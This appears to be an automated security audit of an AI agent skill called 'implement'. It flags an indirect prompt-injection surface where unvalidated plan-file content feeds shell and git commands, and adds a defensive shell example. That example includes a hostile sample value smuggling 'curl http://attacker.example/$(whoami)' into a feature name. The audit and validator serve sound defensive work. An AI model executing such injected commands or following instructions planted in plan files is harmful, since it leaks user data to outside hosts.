implement
Pass
Audited by Gen Agent Trust Hub on Feb 18, 2026
Risk Level: SAFE
Tags: COMMAND_EXECUTION, PROMPT_INJECTION
Full Analysis
- [Command Execution] (LOW): The skill generates and executes shell scripts to automate git branch creation and file initialization (Step 5). This falls under simple script generation from known templates, which is a standard but low-risk operation.
- [Indirect Prompt Injection] (LOW): The skill defines a surface where untrusted data from implementation plans is used to populate variables in shell commands.
  - Ingestion points: Data is read from files within `.specify/memory/plans/` as described in `operations/handoff.md`.
  - Boundary markers: Absent; the skill does not specify delimiters or warnings to ignore instructions embedded within the plan files.
  - Capability inventory: The skill utilizes shell command execution (`git`, `cat`) within the `handoff.md` procedure.
  - Sanitization: Absent; there is no explicit validation or escaping of the `FEATURE_NAME` variable before it is used in command execution.
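The finding above concerns a value read from an untrusted plan file and interpolated into a `git` command without validation. The following is an added example, not the skill's own code and not part of the audit, showing the check a practitioner would put in front of that interpolation: the feature name is extracted without `eval` or command substitution of file contents, then accepted only if it matches a strict allowlist for branch names. The `feature: <name>` line format, the `feature/` branch prefix, and the function names are assumptions made for this example; the sample plan files are constructed inline.

```sh
#!/usr/bin/env sh
# Added example, not the skill's code. Assumes plan files carry a line
# "feature: <name>" (an assumption for this example, not the skill's format).

# Accept only a safe branch component: starts with a letter or digit, then
# letters, digits, '.', '_' or '-', and never contains "..". A leading '-'
# would otherwise be parsed by git as an option; spaces, ';', '$(' etc.
# would be interpreted by the shell when the generated script runs.
validate_feature_name() {
    case "$1" in
        '' ) return 1 ;;
        *..* ) return 1 ;;
        [!A-Za-z0-9]* ) return 1 ;;
        *[!A-Za-z0-9._-]* ) return 1 ;;
    esac
    return 0
}

# Pull the feature name out of a plan file as plain text. sed only strips the
# "feature:" prefix; nothing from the file is evaluated as shell.
feature_name_from_plan() {
    sed -n 's/^feature:[[:space:]]*//p' "$1" | head -n 1
}

# Build the branch-creation command only after validation. The command is
# printed rather than executed so the example runs without a git repository.
plan_branch_command() {
    name=$(feature_name_from_plan "$1") || return 1
    if ! validate_feature_name "$name"; then
        echo "rejected feature name from $1: $name" >&2
        return 1
    fi
    printf 'git checkout -b %s\n' "feature/$name"
}

# Constructed sample inputs: a benign plan and one carrying an injected payload.
WORKDIR=$(mktemp -d)
trap 'rm -rf "$WORKDIR"' EXIT
printf 'feature: user-login\n' > "$WORKDIR/benign.md"
printf 'feature: x; curl http://attacker.example/$(whoami)\n' > "$WORKDIR/hostile.md"

plan_branch_command "$WORKDIR/benign.md"
plan_branch_command "$WORKDIR/hostile.md" || echo "hostile plan blocked"
```

The allowlist is deliberately narrower than what git accepts for ref names; rejecting anything outside it is cheaper and safer than trying to quote arbitrary plan content correctly inside a generated script.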
Audit Metadata